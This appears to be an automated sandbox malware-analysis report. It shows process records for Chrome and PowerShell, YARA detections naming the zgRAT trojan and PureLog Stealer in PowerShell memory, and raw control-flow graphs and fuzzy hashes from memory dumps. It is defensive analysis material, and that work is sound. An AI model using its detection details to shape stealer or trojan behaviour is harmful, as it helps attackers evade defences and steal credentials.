                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1892,i,10163335198657100473,3974397654279076089,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                    Imagebase:0x7ff678760000
                                                                                                                    File size:3'242'272 bytes
                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:10
                                                                                                                    Start time:12:58:25
                                                                                                                    Start date:30/09/2024
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                                    File size:452'608 bytes
                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Reset < >
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.4015513248.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4add0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ce1f7e9f6acc16c2a6ab401c6790912e88cc8b9d6599e38ac3f23f35e3135fff
                                                                                                                      • Instruction ID: 005e1bf8e49ff4d65ace40576bfb074abef46f5c7d6cfa1eed8830c8ce295f0c
                                                                                                                      • Opcode Fuzzy Hash: ce1f7e9f6acc16c2a6ab401c6790912e88cc8b9d6599e38ac3f23f35e3135fff
                                                                                                                      • Instruction Fuzzy Hash: 9A02F3A0B2D68A4BE759BF38C9552B57BD5EF95304F2400F9D88DCB2C3DD1DA8428392
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.4016162238.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4aea0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 26b0cfe25520885aa116bb36696f672c809ce8ef07cae51fa223661080afb441
                                                                                                                      • Instruction ID: 89186011ac8e135d56b82b1a26e07a9ae720bfc609ebaca7b773fd1037d6561d
                                                                                                                      • Opcode Fuzzy Hash: 26b0cfe25520885aa116bb36696f672c809ce8ef07cae51fa223661080afb441
                                                                                                                      • Instruction Fuzzy Hash: 4F41D37164DB898FEB46EF28C4909A13BE5EF6B31076901EBC049CF193C929EC49C751
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.4015513248.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4add0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9431bc09509f342be62d12746c2f03bae80494232bbb7956d41e9376d9aeb36b
                                                                                                                      • Instruction ID: 9ceada59ae7f5684020ceaec4593592c9b256de14b856945832fc0c39b378935
                                                                                                                      • Opcode Fuzzy Hash: 9431bc09509f342be62d12746c2f03bae80494232bbb7956d41e9376d9aeb36b
                                                                                                                      • Instruction Fuzzy Hash: 3231B8A6B0DBA54FD3167B7CE8660E43FA4DF8326171941F7C4C9CA0A7C919581AC3B1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.4015513248.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ffb4add0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                      • Instruction ID: 8820f41509ff56b215bbb5e65c405339ddca1624b15061ccc633b362891bad74
                                                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                      • Instruction Fuzzy Hash: A401A77010CB0C8FD744EF0CE451AA6B3E0FB85320F10056DE58AC3691D736E882CB41

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:2.6%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:8
                                                                                                                      Total number of Limit Nodes:1
                                                                                                                      execution_graph 14216 7ffb4add45ea 14217 7ffb4ae1fc60 GetFileType 14216->14217 14219 7ffb4ae1fce4 14217->14219 14220 7ffb4addd4f9 14222 7ffb4addd50f 14220->14222 14221 7ffb4addd552 14222->14221 14223 7ffb4addd67d CreateFileW 14222->14223 14224 7ffb4addd6de 14223->14224

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 7ffb4add6e00-7ffb4addc73a 4 7ffb4addc73c-7ffb4addc74c 0->4 5 7ffb4addc74e-7ffb4addc75f 0->5 4->4 4->5 6 7ffb4addc770-7ffb4addc7a1 5->6 7 7ffb4addc761-7ffb4addc76f 5->7 11 7ffb4addc7f7-7ffb4addc7fe 6->11 12 7ffb4addc7a3-7ffb4addc7a9 6->12 7->6 13 7ffb4addc800-7ffb4addc801 11->13 14 7ffb4addc83f-7ffb4addc868 11->14 12->11 15 7ffb4addc7ab-7ffb4addc7ac 12->15 16 7ffb4addc804-7ffb4addc807 13->16 17 7ffb4addc7af-7ffb4addc7b2 15->17 18 7ffb4addc869-7ffb4addcb2c call 7ffb4add4620 16->18 19 7ffb4addc809-7ffb4addc81a 16->19 17->18 21 7ffb4addc7b8-7ffb4addc7c8 17->21 62 7ffb4addcb33-7ffb4addcb93 18->62 22 7ffb4addc836-7ffb4addc83d 19->22 23 7ffb4addc81c-7ffb4addc822 19->23 24 7ffb4addc7ca-7ffb4addc7ec 21->24 25 7ffb4addc7f0-7ffb4addc7f5 21->25 22->14 22->16 23->18 27 7ffb4addc824-7ffb4addc832 23->27 24->25 25->11 25->17 27->22 63 7ffb4addcb9a-7ffb4addcbb6 62->63 65 7ffb4addcbb8-7ffb4addcbba 63->65 66 7ffb4addcbbc-7ffb4addcbd5 63->66 68 7ffb4addcbd7-7ffb4addcbe5 65->68 66->68 69 7ffb4addcc72-7ffb4addcc9e 68->69 70 7ffb4addcbeb-7ffb4addcc71 call 7ffb4add7be8 68->70 73 7ffb4addcd58-7ffb4addcd98 69->73 74 7ffb4addcca4-7ffb4addcd57 call 7ffb4add7b98 69->74 70->69 83 7ffb4addce89-7ffb4addce97 call 7ffb4addcf2e 73->83 84 7ffb4addcd9e-7ffb4addcdac 73->84 74->73 97 7ffb4addceaa-7ffb4addceb5 83->97 98 7ffb4addce99-7ffb4addcea9 83->98 87 7ffb4addcdb2-7ffb4addcdbd 84->87 88 7ffb4addce41-7ffb4addce6f 84->88 102 7ffb4addce82-7ffb4addce86 88->102 103 7ffb4addce71-7ffb4addce81 88->103 104 7ffb4addceb7-7ffb4addcefb call 7ffb4add2ed8 97->104 105 7ffb4addcf0d-7ffb4addcf2d 97->105 98->97 102->83 103->102 104->105
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RRJ$ZL_H$x6NR$x6NR$x6NR$x6NR$6NR$6NR
                                                                                                                      • API String ID: 0-1410031789
                                                                                                                      • Opcode ID: 6b0c4bbf6cc7639d03259af056affe7e458167d5ba01ff01f82b9d9ff0b3491b
                                                                                                                      • Instruction ID: b58f5810b8da64bd202f1dbbcd3cc3a7a33cc7d16eaec94c63e0a6e872bc9445
                                                                                                                      • Opcode Fuzzy Hash: 6b0c4bbf6cc7639d03259af056affe7e458167d5ba01ff01f82b9d9ff0b3491b
                                                                                                                      • Instruction Fuzzy Hash: 434258B1B1DB8A4FE799EF78C4466B57BD1EF45310F1441FED08AC7196DE2898428780

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ZL_H$x6NR$x6NR$x6NR$6NR$6NR
                                                                                                                      • API String ID: 0-3653175083
                                                                                                                      • Opcode ID: c830cc3d7a0303900f7015a8c0e2543c055cca81245aa3a095a6ba680e1a3c30
                                                                                                                      • Instruction ID: e8a4c805ba53736056835b19927d0ecb55eaae90ce1ca08c3e0acaa3c27b519f
                                                                                                                      • Opcode Fuzzy Hash: c830cc3d7a0303900f7015a8c0e2543c055cca81245aa3a095a6ba680e1a3c30
                                                                                                                      • Instruction Fuzzy Hash: 89E125B1B1DB464FE789EF78841A2B9BBD1EF95310B1541FED04AC7296DD2C9C028780

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ZL_H$x6NR$6NR$6NR
                                                                                                                      • API String ID: 0-2310312892
                                                                                                                      • Opcode ID: 09f167540d58abf1201ba3bdcad9954638e83fa7e1d306348e110ce852aaaf1c
                                                                                                                      • Instruction ID: 5ffb10e6e6a1efcfc264e427a05a98b3bb2bf9cccc40f6b56a473d1cb1d96b81
                                                                                                                      • Opcode Fuzzy Hash: 09f167540d58abf1201ba3bdcad9954638e83fa7e1d306348e110ce852aaaf1c
                                                                                                                      • Instruction Fuzzy Hash: 96B103B1B0DB464FE799AF78841A2B97BD1EF85710B1541FED04EC72A2DD2C9C428741

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6NR$6NR
                                                                                                                      • API String ID: 0-441463189
                                                                                                                      • Opcode ID: 1540740a95a5c100fb5912310eac8401813530b78383aa741b17eb397b47558e
                                                                                                                      • Instruction ID: 110ac9e4bd9b51f6fdc11656ea85ad97d8dc690a7f72e1fb0e042f30ae2aea6f
                                                                                                                      • Opcode Fuzzy Hash: 1540740a95a5c100fb5912310eac8401813530b78383aa741b17eb397b47558e
                                                                                                                      • Instruction Fuzzy Hash: 58A124B1B0DB464FE799AF7C842A1B97BD1EF85720B1541FED04EC72A2DD285C428741

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 195 7ffb4aea80f5-7ffb4aea8121 196 7ffb4aea8123-7ffb4aea8138 195->196 199 7ffb4aea80c4-7ffb4aea80ef 196->199 200 7ffb4aea813a-7ffb4aea815d 196->200 199->195 201 7ffb4aea815e 200->201 202 7ffb4aea815f-7ffb4aea8184 200->202 201->202 203 7ffb4aea818a-7ffb4aea8194 202->203 204 7ffb4aea83ec-7ffb4aea84ab 202->204 206 7ffb4aea8196-7ffb4aea81a3 203->206 207 7ffb4aea81ad-7ffb4aea81b2 203->207 206->207 217 7ffb4aea81a5-7ffb4aea81ab 206->217 210 7ffb4aea81b8-7ffb4aea81bb 207->210 211 7ffb4aea8390-7ffb4aea839a 207->211 213 7ffb4aea81bd-7ffb4aea81d0 210->213 214 7ffb4aea81d2 210->214 215 7ffb4aea83a9-7ffb4aea83e9 211->215 216 7ffb4aea839c-7ffb4aea83a8 211->216 219 7ffb4aea81d4-7ffb4aea81d6 213->219 214->219 215->204 217->207 219->211 222 7ffb4aea81dc-7ffb4aea8210 219->222 235 7ffb4aea8227 222->235 236 7ffb4aea8212-7ffb4aea8225 222->236 238 7ffb4aea8229-7ffb4aea822b 235->238 236->238 238->211 240 7ffb4aea8231-7ffb4aea8239 238->240 240->204 241 7ffb4aea823f-7ffb4aea8249 240->241 243 7ffb4aea8265-7ffb4aea8275 241->243 244 7ffb4aea824b-7ffb4aea8263 241->244 243->211 248 7ffb4aea827b-7ffb4aea82ac 243->248 244->243 248->211 254 7ffb4aea82b2-7ffb4aea82de 248->254 259 7ffb4aea8309 254->259 260 7ffb4aea82e0-7ffb4aea8307 254->260 261 7ffb4aea830b-7ffb4aea830d 259->261 260->261 261->211 263 7ffb4aea8313-7ffb4aea831b 261->263 264 7ffb4aea831d-7ffb4aea8327 263->264 265 7ffb4aea832b 263->265 266 7ffb4aea8329 264->266 267 7ffb4aea8347-7ffb4aea8366 264->267 268 7ffb4aea8330-7ffb4aea8346 265->268 266->268 272 7ffb4aea8370-7ffb4aea8376 267->272 268->267 273 7ffb4aea837d-7ffb4aea838f 272->273
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1696332461.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4aea0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0q+K$0q+K$0q+K$0q+K$0q+K
                                                                                                                      • API String ID: 0-1092807211
                                                                                                                      • Opcode ID: 8a06f467d8db1d1032902d286f9bca3a6b00a909070240635b1bde5399bd7bd6
                                                                                                                      • Instruction ID: be57bf102c29eb14c891688b11a8620075a5c0fd2d01da90028e99d7a1990c52
                                                                                                                      • Opcode Fuzzy Hash: 8a06f467d8db1d1032902d286f9bca3a6b00a909070240635b1bde5399bd7bd6
                                                                                                                      • Instruction Fuzzy Hash: D3D144B290DA898FE7A6FF78C8551B5BBE5FF56310B2801FAD45DC7083D918A806C391

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 2b416b6df07aa58923e31e3aa4907591762f6336776f114ed6d6b21d65100968
                                                                                                                      • Instruction ID: 9c42fbd0692aad10f2e23b0196de4e720c6b246e6397728337230f271c23c0ab
                                                                                                                      • Opcode Fuzzy Hash: 2b416b6df07aa58923e31e3aa4907591762f6336776f114ed6d6b21d65100968
                                                                                                                      • Instruction Fuzzy Hash: 7C710AB1A0DB494FDB59EF6CD8466B97BE0FF55310F1442BED08AD3292DB34A8028781

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 463 7ffb4add45da-7ffb4addd673 467 7ffb4addd675-7ffb4addd67a 463->467 468 7ffb4addd67d-7ffb4addd6dc CreateFileW 463->468 467->468 469 7ffb4addd6e4-7ffb4addd70c 468->469 470 7ffb4addd6de 468->470 470->469
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: d3cbcb5d922999b7ddb36f0f216c45cebe42487a76f1bc84a47cb934380b1aa9
                                                                                                                      • Instruction ID: e074fbd1f419ab793976fa3ab9084c9366a1d1984918191769ba2930ea88e5d6
                                                                                                                      • Opcode Fuzzy Hash: d3cbcb5d922999b7ddb36f0f216c45cebe42487a76f1bc84a47cb934380b1aa9
                                                                                                                      • Instruction Fuzzy Hash: EF31917191CA1C9FDB58EF58D846AF977E0FB69321F10422EE04EE3251CB70A8128BC1

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 472 7ffb4add45ea-7ffb4ae1fce2 GetFileType 476 7ffb4ae1fce4 472->476 477 7ffb4ae1fcea-7ffb4ae1fd0f 472->477 476->477
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1695509857.00007FFB4ADD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4add0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3081899298-0
                                                                                                                      • Opcode ID: 3dd75d4df9f798202310af213f101ee6d389867b3c37768b88645c7e8b611511
                                                                                                                      • Instruction ID: 83b863c18a0d143a0bec99ca946176086577062ac59b7af335436b4b22c97bd3
                                                                                                                      • Opcode Fuzzy Hash: 3dd75d4df9f798202310af213f101ee6d389867b3c37768b88645c7e8b611511
                                                                                                                      • Instruction Fuzzy Hash: A021A170A0CA0C9FDB58EFA8C445BF9BBE4FB55321F10412ED04AD3651DB70A816CB90

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 620 7ffb4aea15dd-7ffb4aea15e7 621 7ffb4aea15e9 620->621 622 7ffb4aea15ee-7ffb4aea15ff 620->622 621->622 623 7ffb4aea15eb 621->623 624 7ffb4aea1606-7ffb4aea1617 622->624 625 7ffb4aea1601 622->625 623->622 627 7ffb4aea1619 624->627 628 7ffb4aea161e-7ffb4aea162f 624->628 625->624 626 7ffb4aea1603 625->626 626->624 627->628 629 7ffb4aea161b 627->629 630 7ffb4aea1636-7ffb4aea1642 628->630 631 7ffb4aea1631 628->631 629->628 633 7ffb4aea1644-7ffb4aea1647 630->633 631->630 632 7ffb4aea1633 631->632 632->630 634 7ffb4aea1649 633->634 635 7ffb4aea164e-7ffb4aea16b8 633->635 634->635 637 7ffb4aea164b 634->637 635->633 638 7ffb4aea16ba-7ffb4aea170f 635->638 637->635 641 7ffb4aea1926-7ffb4aea19a5 638->641 642 7ffb4aea1715-7ffb4aea171f 638->642 670 7ffb4aea19ac-7ffb4aea19bb 641->670 643 7ffb4aea173b-7ffb4aea1748 642->643 644 7ffb4aea1721-7ffb4aea1739 642->644 651 7ffb4aea18bb-7ffb4aea18c5 643->651 652 7ffb4aea174e-7ffb4aea1751 643->652 644->643 655 7ffb4aea18d8-7ffb4aea1923 651->655 656 7ffb4aea18c7-7ffb4aea18d7 651->656 652->651 654 7ffb4aea1757-7ffb4aea175f 652->654 654->641 659 7ffb4aea1765-7ffb4aea176f 654->659 655->641 660 7ffb4aea1789-7ffb4aea178f 659->660 661 7ffb4aea1771-7ffb4aea177f 659->661 660->651 664 7ffb4aea1795-7ffb4aea1798 660->664 661->660 666 7ffb4aea1781-7ffb4aea1787 661->666 667 7ffb4aea179a-7ffb4aea17ad 664->667 668 7ffb4aea17e1 664->668 666->660 667->641 678 7ffb4aea17b3-7ffb4aea17bd 667->678 669 7ffb4aea17e3-7ffb4aea17e5 668->669 669->651 672 7ffb4aea17eb-7ffb4aea17ee 669->672 677 7ffb4aea19c6-7ffb4aea19cb 670->677 675 7ffb4aea1805-7ffb4aea1809 672->675 676 7ffb4aea17f0-7ffb4aea17f9 672->676 675->651 683 7ffb4aea180f-7ffb4aea1815 675->683 676->675 688 7ffb4aea19cc-7ffb4aea19d7 677->688 681 7ffb4aea17d6-7ffb4aea17df 678->681 682 7ffb4aea17bf-7ffb4aea17d4 678->682 681->669 682->681 686 7ffb4aea1817-7ffb4aea1824 683->686 687 7ffb4aea1831-7ffb4aea1837 683->687 686->687 696 7ffb4aea1826-7ffb4aea182f 686->696 692 7ffb4aea1853-7ffb4aea1875 687->692 693 7ffb4aea1839-7ffb4aea1846 687->693 690 7ffb4aea19d9 688->690 691 7ffb4aea19e0-7ffb4aea19ef 688->691 690->691 697 7ffb4aea19f8-7ffb4aea1a40 691->697 698 7ffb4aea19f1 691->698 705 7ffb4aea187c-7ffb4aea1880 692->705 693->692 702 7ffb4aea1848-7ffb4aea1851 693->702 696->687 697->688 704 7ffb4aea1a42-7ffb4aea1a57 697->704 698->697 702->692 708 7ffb4aea1887-7ffb4aea1890 705->708 709 7ffb4aea18a9-7ffb4aea18ba 708->709 710 7ffb4aea1892-7ffb4aea18a7 708->710 710->709
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1696332461.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4aea0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e3d93a044c44357399f811e164dee71259c96caa2d4551c5dcd4b5a10092e921
                                                                                                                      • Instruction ID: e9803ada1f6c1dfc367fe10d11e088c21460d252d2fd19142f7452b37e2acb9e
                                                                                                                      • Opcode Fuzzy Hash: e3d93a044c44357399f811e164dee71259c96caa2d4551c5dcd4b5a10092e921
                                                                                                                      • Instruction Fuzzy Hash: EB02F4A194EBC58FD397AF38A9151B47FE5EF83210B2901FBD098CB093D9199C06C392

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 713 7ffb4aea2c71-7ffb4aea2c9a 714 7ffb4aea2e55-7ffb4aea2ef2 713->714 715 7ffb4aea2ca0-7ffb4aea2caa 713->715 748 7ffb4aea2ef4-7ffb4aea2f03 714->748 716 7ffb4aea2cc3-7ffb4aea2cc8 715->716 717 7ffb4aea2cac-7ffb4aea2cc1 715->717 719 7ffb4aea2dee-7ffb4aea2df8 716->719 720 7ffb4aea2cce-7ffb4aea2cd1 716->720 717->716 723 7ffb4aea2dfa-7ffb4aea2e08 719->723 724 7ffb4aea2e09-7ffb4aea2e52 719->724 725 7ffb4aea2cd3-7ffb4aea2cdc 720->725 726 7ffb4aea2ce8-7ffb4aea2cec 720->726 724->714 725->726 726->719 733 7ffb4aea2cf2-7ffb4aea2d26 726->733 744 7ffb4aea2d28-7ffb4aea2d3b 733->744 745 7ffb4aea2d3d 733->745 747 7ffb4aea2d3f-7ffb4aea2d41 744->747 745->747 747->719 749 7ffb4aea2d47-7ffb4aea2d4a 747->749 750 7ffb4aea2f05 748->750 751 7ffb4aea2f0a-7ffb4aea2f1b 748->751 749->719 752 7ffb4aea2d50-7ffb4aea2d53 749->752 750->751 754 7ffb4aea2f07 750->754 755 7ffb4aea2f1d 751->755 756 7ffb4aea2f22-7ffb4aea2f68 call 7ffb4aea2f8f 751->756 752->719 753 7ffb4aea2d59-7ffb4aea2d93 752->753 767 7ffb4aea2d95-7ffb4aea2dad 753->767 768 7ffb4aea2daf-7ffb4aea2db5 753->768 754->751 755->756 757 7ffb4aea2f1f 755->757 756->748 766 7ffb4aea2f6a-7ffb4aea2f7f 756->766 757->756 767->768 770 7ffb4aea2dbc-7ffb4aea2dc5 768->770 772 7ffb4aea2dc7-7ffb4aea2dd4 770->772 773 7ffb4aea2dde-7ffb4aea2ded 770->773 772->773 775 7ffb4aea2dd6-7ffb4aea2ddc 772->775 775->773
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1696332461.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4aea0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 41555e43ffdaa634eecd3f9ffda4351d6080b86b937fd434b3380ec1fc74509b
                                                                                                                      • Instruction ID: e48de3ece371328c77bc8dc04c7b12ed24e44da688dc1f91caa5de616c185703
                                                                                                                      • Opcode Fuzzy Hash: 41555e43ffdaa634eecd3f9ffda4351d6080b86b937fd434b3380ec1fc74509b
                                                                                                                      • Instruction Fuzzy Hash: 61B13BA2A4DB8A8FE396BE3888151B47BD5EF46320B2801FBD45DDB1E3DD189C468351

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 777 7ffb4aea52b6-7ffb4aea52ed 780 7ffb4aea5316-7ffb4aea5341 777->780 781 7ffb4aea52ef-7ffb4aea5314 777->781 786 7ffb4aea5345-7ffb4aea5349 780->786 781->780 788 7ffb4aea5350-7ffb4aea5361 786->788 789 7ffb4aea5364-7ffb4aea536d 788->789 790 7ffb4aea5363 788->790 791 7ffb4aea5375 789->791 792 7ffb4aea536f 789->792 790->789 793 7ffb4aea5378-7ffb4aea5389 791->793 794 7ffb4aea5377 791->794 792->791 795 7ffb4aea538c-7ffb4aea5399 793->795 796 7ffb4aea538b 793->796 794->793 795->786 797 7ffb4aea539b-7ffb4aea53b4 795->797 796->795 798 7ffb4aea5404-7ffb4aea5448 797->798 799 7ffb4aea53b6-7ffb4aea53d2 797->799 801 7ffb4aea53d4-7ffb4aea53d8 798->801 807 7ffb4aea544a-7ffb4aea5461 798->807 799->801 801->789 803 7ffb4aea53da-7ffb4aea53f9 801->803 803->798 808 7ffb4aea5462 807->808 808->808
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.1696332461.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_7ffb4aea0000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 67f2d0bd7f7944c27f1df87ed32088de0929190dd21b6e944fc184cec2d1f27c
                                                                                                                      • Instruction ID: 85c5e1c0213d4641f8d677e8a2166695ef9fd523ce7c6287c9ef5b3f34cd85a5
                                                                                                                      • Opcode Fuzzy Hash: 67f2d0bd7f7944c27f1df87ed32088de0929190dd21b6e944fc184cec2d1f27c
                                                                                                                      • Instruction Fuzzy Hash: 8F5170A188E7C59FE3536B7488654A57FE8EF5722072900EBD4D9CB0A3D94C1C0AC372
                                                                                                                      Memory Dump Source
